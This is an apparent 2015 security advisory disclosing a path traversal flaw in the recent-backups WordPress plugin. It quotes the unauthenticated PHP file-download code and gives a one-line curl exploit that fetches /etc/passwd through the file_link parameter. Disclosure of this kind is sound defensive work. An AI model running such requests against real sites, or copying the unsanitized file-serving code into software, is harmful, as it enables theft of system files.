Advisory #: 144
Title: Arbitrary file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
CVE-ID:[CVE-2015-1000006]
CWE: CWE-22 Path Traversal
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 2015-07-14
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=144
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used to download sensitive system files: 2 $file = $_GET['file_link']; 3 4 if (file_exists($file)) { 5 header('Content-Description: File Transfer'); 6 header('Content-Type: application/octet-stream'); 7 header('Content-Disposition: attachment; filename='.basename($file)); 8 header('Content-Transfer-Encoding: binary'); 9 header('Expires: 0'); 10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 11 header('Pragma: public'); 12 header('Content-Length: ' . filesize($file)); 13 ob_clean(); 14 flush(); 15 readfile($file);
Export: JSON TEXT XML
Exploit Code:
  1. $ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
Screen Shots:
Notes: